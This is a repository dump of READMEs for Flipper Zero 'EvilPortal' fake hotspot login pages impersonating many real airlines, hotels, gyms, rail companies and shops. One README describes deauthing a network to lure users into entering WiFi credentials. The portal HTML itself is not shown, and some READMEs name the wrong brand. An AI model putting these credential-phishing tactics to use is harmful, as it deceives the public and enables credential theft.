-------------------------------------------------------------------------------- /Brands/Carlsberg/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Carlsberg "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Brands/Coca-Cola/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Coca-Cola "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Gyms/Basic-Fit/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a BASIC-FIT "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Hotels/Novotel/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Novotel "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Theme Parks/Walibi/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Walibi "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Airlines/SwissAir/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a SWISSAIR "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Gyms/Fitness First/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Fitness First "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Gyms/Holmes Place/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Holmes Place "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Supermarkets/Delhaize/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Delhaize "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Theme Parks/Efteling/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an Efteling "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Airlines/Air France/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an Air France "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Brands/Red Bull/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Red Bull "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | Go RBR 4 | 5 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 6 | ## Happy flippin' 7 | 8 | -------------------------------------------------------------------------------- /Gyms/Anytime Fitness/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an Anytime Fitness "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Hotels/Radisson/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Radisson Hotel "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Hotels/Sheraton/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Sheraton Hotel "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Theme Parks/Disneyland Paris/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Disneyland Paris "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Airlines/Brussels Airlines/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Brussels Airlines "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/KFC/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Kentucky Fried Chicken "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Quick/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Quick Burger Restaurant "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 | -------------------------------------------------------------------------------- /Supermarkets/Tesco/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Tesco "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 |  9 | -------------------------------------------------------------------------------- /Airlines/Lufthansa/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Lufthansa "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 |  9 | -------------------------------------------------------------------------------- /Supermarkets/IKEA/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an IKEA "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | This one comes complete, no need to build it with a stupd manual. 4 | 5 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 6 | ## Happy flippin' 7 | 8 | -------------------------------------------------------------------------------- /Airlines/Ryanair/README.md: -------------------------------------------------------------------------------- 1 | This one emulates a portal for a Ryanair "Free Hotspot" using EvilPortal on your Flipper Zero. 2 | Not that anything is free at Ryanair but who cares. 3 | !!FOR EDUCATIONAL USES ONLY!! 4 | The HTML in the "WithForgotCredentials" file contains a "forgot credentials" button on the user side to make it look more realistic. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | Happy flippin' 6 |  7 | -------------------------------------------------------------------------------- /Airlines/KLM/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a KLM "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | KLM is the Dutch national airline. Not like they would give you anything for free anyway. 4 | 5 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 6 | ## Happy flippin' 7 | 8 | -------------------------------------------------------------------------------- /Airlines/British Airways/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a British Airways "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 |  9 | -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Pizza Hut/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Best Western "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 |  9 | -------------------------------------------------------------------------------- /Railway Companies/National Rail (UK)/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a NR "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | NR, or National Rail, is the national railway company in the UK. 4 | 5 | 6 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 7 | ## Happy flippin' 8 | 9 | -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Starbucks Coffee/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Starbucks "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 |  9 | -------------------------------------------------------------------------------- /Hotels/Best Western Hotels/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Best Western "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 8 |  9 | -------------------------------------------------------------------------------- /WiFi Routers/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | These portals are made to emulate a "router setup WiFi". Could be used in a situation where a WiFi gets deauthed and the users are trying to find the reason they don't have internet. They would think they need to connect to this new portal with their router's brand and give their WiFi creds to update their machine. 3 | 4 | ## I only made this to show the capabilities. I mean it when I say this is not meant to be used on real victims, you would be an a**hole if you do it 5 | 6 | ## Happy flippin' 7 | 8 | 9 | -------------------------------------------------------------------------------- /Railway Companies/Deutsche Bahn/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an Deutsche Bahn "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | DB is the German Railway company. 4 | 5 | # I also included a German version of the portal 6 | 7 | 8 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 9 | ## Happy flippin' 10 | 11 | 12 | -------------------------------------------------------------------------------- /Railway Companies/renfe (Spanish Rail)/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a renfe "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | Renfe is the Spanish Railway company. 4 | 5 | # I also included a Spanish version of the portal 6 | 7 | 8 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 9 | ## Happy flippin' 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Railway Companies/Nederlandse Spoorwegen (Dutch Rail)/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a NS "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | NS, or Nederlandse Spoorwegen, is the Dutch national railway company. 4 | 5 | # I also included a Dutch version of the portal 6 | 7 | 8 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 9 | ## Happy flippin' 10 | 11 | -------------------------------------------------------------------------------- /Railway Companies/Thalys/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an SNCF "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | SNCF is the French Railway company. 4 | 5 | # I also included a French version of the portal 6 | 7 | 8 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 9 | ## Happy flippin' 10 | 11 | 12 |  13 | -------------------------------------------------------------------------------- /Railway Companies/SNCF (French Rail)/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an SNCF "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | SNCF is the French Railway company. 4 | 5 | # I also included a French version of the portal 6 | 7 | 8 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 9 | ## Happy flippin' 10 | 11 | 12 |  13 | -------------------------------------------------------------------------------- /Internet Providers/Telefónica/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Telefónica "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | Telefónica is a Spanish internet provider. 4 | 5 | # I also included a Spanish version of the portal 6 | 7 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 8 | ## Happy flippin' 9 | 10 | 11 |  12 | -------------------------------------------------------------------------------- /Internet Providers/Deutsche Telekom/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Deutsche Telekom "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | You guessed it, Deutsche Telekom is a German internet provider. 4 | 5 | # I also included a German version of the portal 6 | 7 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 8 | ## Happy flippin' 9 | 10 | 11 |  12 | -------------------------------------------------------------------------------- /Railway Companies/SNCB-NMBS (Belgian Rail)/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Belgian-Rail "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | SNCB (in French), NMBS (in Dutch) or B-rail (in both) is the Belgian railway company. Yes, one company, 3 names. Welcome to Belgium. 4 | 5 | # I also included a French and Dutch version of the portal 6 | 7 | 8 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 9 | ## Happy flippin' 10 | 11 | -------------------------------------------------------------------------------- /Airlines/Turkish Airlines/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Turkish Airlines "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | # I did not include a Turkish version of the portal as I do not speak the language. I want it done properly and not randomly with ChatGPT or DeepL. Feel free to translate it if you speak it, and of course make a PR. 5 | 6 | 7 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 8 | ## Happy flippin' 9 | 10 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 JordanTav 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Pizza Hut/index.html: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 |
6 | 95 | 96 | 97 | 98 | 99 |